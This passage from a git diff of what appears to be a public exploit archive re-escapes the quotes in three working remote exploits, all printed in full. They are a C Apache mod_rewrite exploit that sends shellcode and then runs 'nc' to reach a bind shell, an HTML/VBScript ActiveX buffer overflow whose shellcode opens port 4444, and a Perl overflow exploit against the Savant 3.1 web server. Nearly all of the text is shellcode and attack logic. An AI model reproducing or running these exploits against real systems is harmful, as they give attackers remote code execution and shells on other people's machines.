+\"\\x4c\\x4b\\x39\\x4f\\x37\\x30\\x31\\x6b\\x6b\\x33\\x63\\x71\\x43\\x42\\x48\\x54\"
+\"\\x42\\x63\\x30\\x76\\x71\\x63\\x6c\\x4c\\x49\\x6d\\x30\\x52\\x4a\\x32\\x30\\x32\"
+\"\\x70\\x36\\x37\\x59\\x6f\\x52\\x75\\x71\\x34\\x50\\x53\\x70\\x57\\x4b\\x4f\\x72\"
+\"\\x75\\x44\\x68\\x61\\x43\\x62\\x74\\x33\\x67\\x59\\x6f\\x63\\x65\\x67\\x50\\x4c\"
+\"\\x49\\x38\\x47\\x6d\\x51\\x5a\\x4c\\x53\\x30\\x36\\x70\\x53\\x30\\x33\\x30\\x4e\"
+\"\\x69\\x4b\\x53\\x53\\x5a\\x43\\x30\\x72\\x48\\x53\\x30\\x34\\x50\\x33\\x30\\x33\"
+\"\\x30\\x50\\x53\\x76\\x37\\x6b\\x4f\\x36\\x35\\x74\\x58\\x6e\\x61\\x4a\\x4c\\x67\"
+\"\\x70\\x35\\x54\\x33\\x30\\x63\\x30\\x49\\x6f\\x78\\x53\\x41\";
 
 
-char finish[]= "HTTP/1.0\r\nHost: ";
+char finish[]= \"HTTP/1.0\\r\\nHost: \";
 
 char payload2[]=
-"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x18"
-"\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\xf0\x20\xfc\xc5"
-"\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x60\xd8\xec\xb1"
-"\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\xf6\xe8\xc3\xa3"
-"\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x23\x8d\x27\x12"
-"\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x47\xc5\x02\xd1"
-"\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x93\x9a\x33\xb1"
-"\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x56\xd7\xef\x6a"
-"\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x47\x8d\xfc\xea"
-"\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x99\x34\x0b\x38"
-"\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\xce\x8a\x50\x69"
-"\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x7e\x8a\x8a\xdb"
-"\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x4d\x26\xd3\x52"
-"\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\xfd\x90\x85\x73"
-"\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x61\x1f\x7a\x6d"
-"\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x91\x3c\x69\x6a"
-"\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\xb2\x27\x41\x17"
-"\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\xe6\x6a\x15\xc5"
-"\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x49\x88\x56\x6b"
-"\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\xe7\xee\xfc\xea"
-"\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\xe8\x53\x07\x65"
-"\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a";
+\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x18\"
+\"\\xd9\\x03\\x3a\\x83\\xeb\\xfc\\xe2\\xf4\\xe4\\xb3\\xe8\\x77\\xf0\\x20\\xfc\\xc5\"
+\"\\xe7\\xb9\\x88\\x56\\x3c\\xfd\\x88\\x7f\\x24\\x52\\x7f\\x3f\\x60\\xd8\\xec\\xb1\"
+\"\\x57\\xc1\\x88\\x65\\x38\\xd8\\xe8\\x73\\x93\\xed\\x88\\x3b\\xf6\\xe8\\xc3\\xa3\"
+\"\\xb4\\x5d\\xc3\\x4e\\x1f\\x18\\xc9\\x37\\x19\\x1b\\xe8\\xce\\x23\\x8d\\x27\\x12\"
+\"\\x6d\\x3c\\x88\\x65\\x3c\\xd8\\xe8\\x5c\\x93\\xd5\\x48\\xb1\\x47\\xc5\\x02\\xd1\"
+\"\\x1b\\xf5\\x88\\xb3\\x74\\xfd\\x1f\\x5b\\xdb\\xe8\\xd8\\x5e\\x93\\x9a\\x33\\xb1\"
+\"\\x58\\xd5\\x88\\x4a\\x04\\x74\\x88\\x7a\\x10\\x87\\x6b\\xb4\\x56\\xd7\\xef\\x6a\"
+\"\\xe7\\x0f\\x65\\x69\\x7e\\xb1\\x30\\x08\\x70\\xae\\x70\\x08\\x47\\x8d\\xfc\\xea\"
+\"\\x70\\x12\\xee\\xc6\\x23\\x89\\xfc\\xec\\x47\\x50\\xe6\\x5c\\x99\\x34\\x0b\\x38\"
+\"\\x4d\\xb3\\x01\\xc5\\xc8\\xb1\\xda\\x33\\xed\\x74\\x54\\xc5\\xce\\x8a\\x50\\x69\"
+\"\\x4b\\x8a\\x40\\x69\\x5b\\x8a\\xfc\\xea\\x7e\\xb1\\x12\\x67\\x7e\\x8a\\x8a\\xdb\"
+\"\\x8d\\xb1\\xa7\\x20\\x68\\x1e\\x54\\xc5\\xce\\xb3\\x13\\x6b\\x4d\\x26\\xd3\\x52\"
+\"\\xbc\\x74\\x2d\\xd3\\x4f\\x26\\xd5\\x69\\x4d\\x26\\xd3\\x52\\xfd\\x90\\x85\\x73\"
+\"\\x4f\\x26\\xd5\\x6a\\x4c\\x8d\\x56\\xc5\\xc8\\x4a\\x6b\\xdd\\x61\\x1f\\x7a\\x6d\"
+\"\\xe7\\x0f\\x56\\xc5\\xc8\\xbf\\x69\\x5e\\x7e\\xb1\\x60\\x57\\x91\\x3c\\x69\\x6a\"
+\"\\x41\\xf0\\xcf\\xb3\\xff\\xb3\\x47\\xb3\\xfa\\xe8\\xc3\\xc9\\xb2\\x27\\x41\\x17\"
+\"\\xe6\\x9b\\x2f\\xa9\\x95\\xa3\\x3b\\x91\\xb3\\x72\\x6b\\x48\\xe6\\x6a\\x15\\xc5\"
+\"\\x6d\\x9d\\xfc\\xec\\x43\\x8e\\x51\\x6b\\x49\\x88\\x69\\x3b\\x49\\x88\\x56\\x6b\"
+\"\\xe7\\x09\\x6b\\x97\\xc1\\xdc\\xcd\\x69\\xe7\\x0f\\x69\\xc5\\xe7\\xee\\xfc\\xea\"
+\"\\x93\\x8e\\xff\\xb9\\xdc\\xbd\\xfc\\xec\\x4a\\x26\\xd3\\x52\\xe8\\x53\\x07\\x65\"
+\"\\x4b\\x26\\xd5\\xc5\\xc8\\xd9\\x03\\x3a\";
 
 int main(int argc, char *argv[])
 {
@@ -121,84 +121,84 @@ int main(int argc, char *argv[])
     char buf[MAXDATASIZE];
     struct hostent *he;
     struct sockaddr_in their_addr;
-    printf("  Exploit: apache mod rewrite exploit (win32)\n"
-           "       By: fabio/b0x (oc-192, old CoTS member)\n"
-           "Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\n"
+    printf(\"  Exploit: apache mod rewrite exploit (win32)\\n\"
+           \"       By: fabio/b0x (oc-192, old CoTS member)\\n\"
+           \"Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\\n\"
            );
     if (argc != 3) {
-        printf("    Usage: ./apache hostname rewrite_path\n");
+        printf(\"    Usage: ./apache hostname rewrite_path\\n\");
         exit(1);
     }
-    printf("\n[+]Preparing payload\n");
+    printf(\"\\n[+]Preparing payload\\n\");
 
     char payload[748];
-    sprintf(payload,"GET /%s%s%s%s%s\r\n\r\n\0",argv[2],get,shellcode,finish,argv[1]);
+    sprintf(payload,\"GET /%s%s%s%s%s\\r\\n\\r\\n\\0\",argv[2],get,shellcode,finish,argv[1]);
 
-    printf("[+]Connecting...\n");
+    printf(\"[+]Connecting...\\n\");
     if ((he=gethostbyname(argv[1])) == NULL) {
-        printf("[-]Cannot resolv hostname...\n");
+        printf(\"[-]Cannot resolv hostname...\\n\");
         exit(1);
     }
     if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
-        printf("[-]Socket error...\n");
+        printf(\"[-]Socket error...\\n\");
         exit(1);
     }
 
     their_addr.sin_family = AF_INET;   
     their_addr.sin_port = htons(PORT);  
     their_addr.sin_addr = *((struct in_addr *)he->h_addr);
-    memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
+    memset(their_addr.sin_zero, \'\\0\', sizeof their_addr.sin_zero);
     if (connect(sockfd, (struct sockaddr *)&their_addr,
                                           sizeof(struct sockaddr)) == -1) {
-        printf("[-]Unable to connect\n");
+        printf(\"[-]Unable to connect\\n\");
         exit(1);
     }
-   printf("[+]Connected\n[+]Sending...\n");
+   printf(\"[+]Connected\\n[+]Sending...\\n\");
    if (send(sockfd, payload, strlen(payload), 0) == -1){
-    printf("[-]Unable to send\n");
+    printf(\"[-]Unable to send\\n\");
     exit(1);
    }
-   printf("[+]Sent\n");
+   printf(\"[+]Sent\\n\");
    close(sockfd);
-   printf("[+]Starting second stage...\n");
+   printf(\"[+]Starting second stage...\\n\");
    sleep(3);
-    printf("[+]Connecting...\n");
+    printf(\"[+]Connecting...\\n\");
     if ((he=gethostbyname(argv[1])) == NULL) { 
-        printf("[-]Cannot resolv hostname...\n");
+        printf(\"[-]Cannot resolv hostname...\\n\");
         exit(1);
     }
     if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
-        printf("[-]Socket error...\n");
+        printf(\"[-]Socket error...\\n\");
         exit(1);
     }
 
     their_addr.sin_family = AF_INET;   
     their_addr.sin_port = htons(PORT2);
     their_addr.sin_addr = *((struct in_addr *)he->h_addr);
-    memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
+    memset(their_addr.sin_zero, \'\\0\', sizeof their_addr.sin_zero);
     if (connect(sockfd, (struct sockaddr *)&their_addr,
                                           sizeof(struct sockaddr)) == -1) {
-        printf("[-]Unable to connect\n");
+        printf(\"[-]Unable to connect\\n\");
         exit(1);
     }
-   printf("[+]Connected\n[+]Sending...\n");
+   printf(\"[+]Connected\\n[+]Sending...\\n\");
    if (send(sockfd, payload2, strlen(payload2), 0) == -1){
-    printf("[-]Unable to send\n");
+    printf(\"[-]Unable to send\\n\");
     exit(1);
    }
-   printf("[+]Sent\n[+]Connecting to shell\n");
+   printf(\"[+]Sent\\n[+]Connecting to shell\\n\");
    close(sockfd);
 
 
    sleep(3);
    int exec;
    char what[1024];
-   sprintf(what," nc -w 10 %s 4445",argv[1]);
+   sprintf(what,\" nc -w 10 %s 4445\",argv[1]);
    exec=system(what);
    if (exec!=0){
-    printf("[-]Not hacked\n");
+    printf(\"[-]Not hacked\\n\");
    } else {
-    printf("[+]Owned\n");
+    printf(\"[+]Owned\\n\");
    }
    exit(1);
 } 
diff --git a/platforms/windows/remote/4094.html b/platforms/windows/remote/4094.html
index b90d5e77f..e9e55a0dc 100755
--- a/platforms/windows/remote/4094.html
+++ b/platforms/windows/remote/4094.html
@@ -99,68 +99,68 @@ ESP 0013EBE8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Basic Crafted Html File
 -----------------------
 
-<object classid='clsid:C26D9CA8-6747-11D5-AD4B-C01857C10000' id='Crash'></object>
+<object classid=\'clsid:C26D9CA8-6747-11D5-AD4B-C01857C10000\' id=\'Crash\'></object>
 
-<input language=VBScript onclick=Boom() type=button value="Dale callAX!">
+<input language=VBScript onclick=Boom() type=button value=\"Dale callAX!\">
 
-<script language = 'vbscript'>
+<script language = \'vbscript\'>
 
 Sub Boom()   
 
 <!-- This exploit opens the port 4444. Thanks to Metasploit for Shellcode -->
                                                          
-  malicious_buffer  = String(656, "x")  
+  malicious_buffer  = String(656, \"x\")  
   
-  eip               = unescape("%EB%AA%3F%7E")
+  eip               = unescape(\"%EB%AA%3F%7E\")
 
-  noping            = String(10, unescape("%90"))
+  noping            = String(10, unescape(\"%90\"))
 
 
-shellcode =    unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
-               unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
-               unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
-               unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
-               unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e") & _
-               unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48") & _
-               unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37") & _
-               unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58") & _
-               unescape("%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46%53%4b%48") & _
-               unescape("%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46%38%42%4c") & _
-               unescape("%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44%4c%4b%4e") & _
-               unescape("%46%4f%4b%53%46%55%46%42%4a%52%45%57%45%4e%4b%58") & _
-               unescape("%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e%30%4b%44") & _
-               unescape("%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e%32%4b%48") & _
-               unescape("%49%38%4e%56%46%42%4e%31%41%46%43%4c%41%53%4b%4d") & _
-               unescape("%46%36%4b%58%43%54%42%43%4b%48%42%44%4e%50%4b%58") & _
-               unescape("%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50%35%4a%56") & _
-               unescape("%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48%4d%48%46") & _
-               unescape("%43%35%48%56%4a%36%43%33%44%53%4a%46%47%47%43%37") & _
-               unescape("%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b%4c%4d%4e") & _
-               unescape("%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49%48%45%4e") & _
-               unescape("%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c%36%44%50") & _
-               unescape("%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d%4a%47%55") & _
-               unescape("%4f%4f%48%4d%43%55%43%35%43%35%43%55%43%45%43%54") & _
-               unescape("%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a%56%41%41") & _
-               unescape("%4e%45%48%46%43%55%49%48%41%4e%45%39%4a%36%46%4a") & _
-               unescape("%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c%46%42%41") & _
-               unescape("%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d%4a%50%32") & _
-               unescape("%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f%4f%42%4d") & _
-               unescape("%4a%36%45%4e%49%34%48%48%49%54%47%45%4f%4f%48%4d") & _
-               unescape("%42%35%46%35%46%55%45%45%4f%4f%42%4d%43%39%4a%46") & _
-               unescape("%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48%4d%45%45") & _
-               unescape("%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a%46%43%46") & _
-               unescape("%4d%56%49%38%45%4e%4c%56%42%45%49%35%49%42%4e%4c") & _
-               unescape("%49%38%47%4e%4c%46%46%54%49%38%44%4e%41%33%42%4c") & _
-               unescape("%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44%44%4e%32") & _
-               unescape("%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b%4a%4a%46") & _
-               unescape("%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46%44%4f%4f") & _
-               unescape("%48%4d%4b%55%47%55%44%55%41%45%41%45%41%45%4c%56") & _
-               unescape("%41%30%41%45%41%35%45%45%41%45%4f%4f%42%4d%4a%46") & _
-               unescape("%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48%4d%4c%36") & _
-               unescape("%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47%35%4e%4f") & _
-               unescape("%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f%4f%42%4d") & _
-               unescape("%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f%4f%48%4d") & _
-               unescape("%4f%4f%42%4d%5a")
+shellcode =    unescape(\"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49\") & _
+               unescape(\"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36\") & _
+               unescape(\"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34\") & _
+               unescape(\"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41\") & _
+               unescape(\"%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e\") & _
+               unescape(\"%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48\") & _
+               unescape(\"%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37\") & _
+               unescape(\"%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58\") & _
+               unescape(\"%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46%53%4b%48\") & _
+               unescape(\"%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46%38%42%4c\") & _
+               unescape(\"%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44%4c%4b%4e\") & _
+               unescape(\"%46%4f%4b%53%46%55%46%42%4a%52%45%57%45%4e%4b%58\") & _
+               unescape(\"%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e%30%4b%44\") & _
+               unescape(\"%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e%32%4b%48\") & _
+               unescape(\"%49%38%4e%56%46%42%4e%31%41%46%43%4c%41%53%4b%4d\") & _
+               unescape(\"%46%36%4b%58%43%54%42%43%4b%48%42%44%4e%50%4b%58\") & _
+               unescape(\"%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50%35%4a%56\") & _
+               unescape(\"%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48%4d%48%46\") & _
+               unescape(\"%43%35%48%56%4a%36%43%33%44%53%4a%46%47%47%43%37\") & _
+               unescape(\"%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b%4c%4d%4e\") & _
+               unescape(\"%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49%48%45%4e\") & _
+               unescape(\"%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c%36%44%50\") & _
+               unescape(\"%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d%4a%47%55\") & _
+               unescape(\"%4f%4f%48%4d%43%55%43%35%43%35%43%55%43%45%43%54\") & _
+               unescape(\"%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a%56%41%41\") & _
+               unescape(\"%4e%45%48%46%43%55%49%48%41%4e%45%39%4a%36%46%4a\") & _
+               unescape(\"%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c%46%42%41\") & _
+               unescape(\"%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d%4a%50%32\") & _
+               unescape(\"%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f%4f%42%4d\") & _
+               unescape(\"%4a%36%45%4e%49%34%48%48%49%54%47%45%4f%4f%48%4d\") & _
+               unescape(\"%42%35%46%35%46%55%45%45%4f%4f%42%4d%43%39%4a%46\") & _
+               unescape(\"%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48%4d%45%45\") & _
+               unescape(\"%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a%46%43%46\") & _
+               unescape(\"%4d%56%49%38%45%4e%4c%56%42%45%49%35%49%42%4e%4c\") & _
+               unescape(\"%49%38%47%4e%4c%46%46%54%49%38%44%4e%41%33%42%4c\") & _
+               unescape(\"%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44%44%4e%32\") & _
+               unescape(\"%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b%4a%4a%46\") & _
+               unescape(\"%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46%44%4f%4f\") & _
+               unescape(\"%48%4d%4b%55%47%55%44%55%41%45%41%45%41%45%4c%56\") & _
+               unescape(\"%41%30%41%45%41%35%45%45%41%45%4f%4f%42%4d%4a%46\") & _
+               unescape(\"%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48%4d%4c%36\") & _
+               unescape(\"%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47%35%4e%4f\") & _
+               unescape(\"%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f%4f%42%4d\") & _
+               unescape(\"%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f%4f%48%4d\") & _
+               unescape(\"%4f%4f%42%4d%5a\")
 
   eat_this       = malicious_buffer + eip + noping + shellcode
 
diff --git a/platforms/windows/remote/4280.pl b/platforms/windows/remote/4280.pl
index fed2b2c08..927686274 100755
--- a/platforms/windows/remote/4280.pl
+++ b/platforms/windows/remote/4280.pl
@@ -9,7 +9,7 @@ use IO::Socket;
 
 if(!($ARGV[1]))
 {
- print "Uso: savant-3.1.pl <victim> <port>\n\n";
+ print \"Uso: savant-3.1.pl <victim> <port>\\n\\n\";
  exit;
 }
 
@@ -17,68 +17,68 @@ if(!($ARGV[1]))
 
 
 
-$victim = IO::Socket::INET->new(Proto=>'tcp',
+$victim = IO::Socket::INET->new(Proto=>\'tcp\',
                                 PeerAddr=>$ARGV[0],
                                 PeerPort=>$ARGV[1])
-                        or die "can't connect on $ARGV[0] sulla porta $ARGV[1]";
+                        or die \"can\'t connect on $ARGV[0] sulla porta $ARGV[1]\";
 
 #Metasploit shellcode
 
 $shellcode = 
-"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb5".
-"\x55\x45\xd4\x83\xeb\xfc\xe2\xf4\x49\x3f\xae\x99\x5d\xac\xba\x2b".
-"\x4a\x35\xce\xb8\x91\x71\xce\x91\x89\xde\x39\xd1\xcd\x54\xaa\x5f".
-"\xfa\x4d\xce\x8b\x95\x54\xae\x9d\x3e\x61\xce\xd5\x5b\x64\x85\x4d".
-"\x19\xd1\x85\xa0\xb2\x94\x8f\xd9\xb4\x97\xae\x20\x8e\x01\x61\xfc".
-"\xc0\xb0\xce\x8b\x91\x54\xae\xb2\x3e\x59\x0e\x5f\xea\x49\x44\x3f".
-"\xb6\x79\xce\x5d\xd9\x71\x59\xb5\x76\x64\x9e\xb0\x3e\x16\x75\x5f".
-"\xf5\x59\xce\xa4\xa9\xf8\xce\x94\xbd\x0b\x2d\x5a\xfb\x5b\xa9\x84".
-"\x4a\x83\x23\x87\xd3\x3d\x76\xe6\xdd\x22\x36\xe6\xea\x01\xba\x04".
-"\xdd\x9e\xa8\x28\x8e\x05\xba\x02\xea\xdc\xa0\xb2\x34\xb8\x4d\xd6".
-"\xe0\x3f\x47\x2b\x65\x3d\x9c\xdd\x40\xf8\x12\x2b\x63\x06\x16\x87".
-"\xe6\x06\x06\x87\xf6\x06\xba\x04\xd3\x3d\x54\x88\xd3\x06\xcc\x35".
-"\x20\x3d\xe1\xce\xc5\x92\x12\x2b\x63\x3f\x55\x85\xe0\xaa\x95\xbc".
-"\x11\xf8\x6b\x3d\xe2\xaa\x93\x87\xe0\xaa\x95\xbc\x50\x1c\xc3\x9d".
-"\xe2\xaa\x93\x84\xe1\x01\x10\x2b\x65\xc6\x2d\x33\xcc\x93\x3c\x83".
-"\x4a\x83\x10\x2b\x65\x33\x2f\xb0\xd3\x3d\x26\xb9\x3c\xb0\x2f\x84".
-"\xec\x7c\x89\x5d\x52\x3f\x01\x5d\x57\x64\x85\x27\x1f\xab\x07\xf9".
-"\x4b\x17\x69\x47\x38\x2f\x7d\x7f\x1e\xfe\x2d\xa6\x4b\xe6\x53\x2b".
-"\xc0\x11\xba\x02\xee\x02\x17\x85\xe4\x04\x2f\xd5\xe4\x04\x10\x85".
-"\x4a\x85\x2d\x79\x6c\x50\x8b\x87\x4a\x83\x2f\x2b\x4a\x62\xba\x04".
-"\x3e\x02\xb9\x57\x71\x31\xba\x02\xe7\xaa\x95\xbc\x45\xdf\x41\x8b".
-"\xe6\xaa\x93\x2b\x65\x55\x45\xd4";
+\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xb5\".
+\"\\x55\\x45\\xd4\\x83\\xeb\\xfc\\xe2\\xf4\\x49\\x3f\\xae\\x99\\x5d\\xac\\xba\\x2b\".
+\"\\x4a\\x35\\xce\\xb8\\x91\\x71\\xce\\x91\\x89\\xde\\x39\\xd1\\xcd\\x54\\xaa\\x5f\".
+\"\\xfa\\x4d\\xce\\x8b\\x95\\x54\\xae\\x9d\\x3e\\x61\\xce\\xd5\\x5b\\x64\\x85\\x4d\".
+\"\\x19\\xd1\\x85\\xa0\\xb2\\x94\\x8f\\xd9\\xb4\\x97\\xae\\x20\\x8e\\x01\\x61\\xfc\".
+\"\\xc0\\xb0\\xce\\x8b\\x91\\x54\\xae\\xb2\\x3e\\x59\\x0e\\x5f\\xea\\x49\\x44\\x3f\".
+\"\\xb6\\x79\\xce\\x5d\\xd9\\x71\\x59\\xb5\\x76\\x64\\x9e\\xb0\\x3e\\x16\\x75\\x5f\".
+\"\\xf5\\x59\\xce\\xa4\\xa9\\xf8\\xce\\x94\\xbd\\x0b\\x2d\\x5a\\xfb\\x5b\\xa9\\x84\".
+\"\\x4a\\x83\\x23\\x87\\xd3\\x3d\\x76\\xe6\\xdd\\x22\\x36\\xe6\\xea\\x01\\xba\\x04\".
+\"\\xdd\\x9e\\xa8\\x28\\x8e\\x05\\xba\\x02\\xea\\xdc\\xa0\\xb2\\x34\\xb8\\x4d\\xd6\".
+\"\\xe0\\x3f\\x47\\x2b\\x65\\x3d\\x9c\\xdd\\x40\\xf8\\x12\\x2b\\x63\\x06\\x16\\x87\".
+\"\\xe6\\x06\\x06\\x87\\xf6\\x06\\xba\\x04\\xd3\\x3d\\x54\\x88\\xd3\\x06\\xcc\\x35\".
+\"\\x20\\x3d\\xe1\\xce\\xc5\\x92\\x12\\x2b\\x63\\x3f\\x55\\x85\\xe0\\xaa\\x95\\xbc\".
+\"\\x11\\xf8\\x6b\\x3d\\xe2\\xaa\\x93\\x87\\xe0\\xaa\\x95\\xbc\\x50\\x1c\\xc3\\x9d\".
+\"\\xe2\\xaa\\x93\\x84\\xe1\\x01\\x10\\x2b\\x65\\xc6\\x2d\\x33\\xcc\\x93\\x3c\\x83\".
+\"\\x4a\\x83\\x10\\x2b\\x65\\x33\\x2f\\xb0\\xd3\\x3d\\x26\\xb9\\x3c\\xb0\\x2f\\x84\".
+\"\\xec\\x7c\\x89\\x5d\\x52\\x3f\\x01\\x5d\\x57\\x64\\x85\\x27\\x1f\\xab\\x07\\xf9\".
+\"\\x4b\\x17\\x69\\x47\\x38\\x2f\\x7d\\x7f\\x1e\\xfe\\x2d\\xa6\\x4b\\xe6\\x53\\x2b\".
+\"\\xc0\\x11\\xba\\x02\\xee\\x02\\x17\\x85\\xe4\\x04\\x2f\\xd5\\xe4\\x04\\x10\\x85\".
+\"\\x4a\\x85\\x2d\\x79\\x6c\\x50\\x8b\\x87\\x4a\\x83\\x2f\\x2b\\x4a\\x62\\xba\\x04\".
+\"\\x3e\\x02\\xb9\\x57\\x71\\x31\\xba\\x02\\xe7\\xaa\\x95\\xbc\\x45\\xdf\\x41\\x8b\".
+\"\\xe6\\xaa\\x93\\x2b\\x65\\x55\\x45\\xd4\";
 
 
 
 
 
-$nop="\x90"x201;
-$incbh="\xfe\xc7"x4;			# inc bh opcode
-$incebx="\x43"x23;			# inc ebx opcode
-$asm1 = "\x53\xc3";			# push ebx,ret opcode
-$nop1="\x90"x19;
-$asm = "\x83\xc4\x8c\x54\xc3";		# add esp,-74,pueh esp,ret for jump in $nop without a direct jmp because there are 						# some opcode not allowed and we have need of space for our shellcode 
-$nop2="\x90"x210;
+$nop=\"\\x90\"x201;
+$incbh=\"\\xfe\\xc7\"x4;			# inc bh opcode
+$incebx=\"\\x43\"x23;			# inc ebx opcode
+$asm1 = \"\\x53\\xc3\";			# push ebx,ret opcode
+$nop1=\"\\x90\"x19;
+$asm = \"\\x83\\xc4\\x8c\\x54\\xc3\";		# add esp,-74,pueh esp,ret for jump in $nop without a direct jmp because there are 						# some opcode not allowed and we have need of space for our shellcode 
+$nop2=\"\\x90\"x210;
 
 
-$eip = "\x74\x86\x41";			# 0x00418674 memory address of pop eax, ret in Savant.exe it's universal
+$eip = \"\\x74\\x86\\x41\";			# 0x00418674 memory address of pop eax, ret in Savant.exe it\'s universal
 
-$exploit = $asm.  " /". $nop.$incbh.$incebx .$asm1.$nop1. $eip ."\r\n\r\n" .$nop2.$shellcode;
+$exploit = $asm.  \" /\". $nop.$incbh.$incebx .$asm1.$nop1. $eip .\"\\r\\n\\r\\n\" .$nop2.$shellcode;
 
 print $victim $exploit;
 
-print " + Malicious GET request sent ...\n";
+print \" + Malicious GET request sent ...\\n\";
 
 
-print "Done.\n";
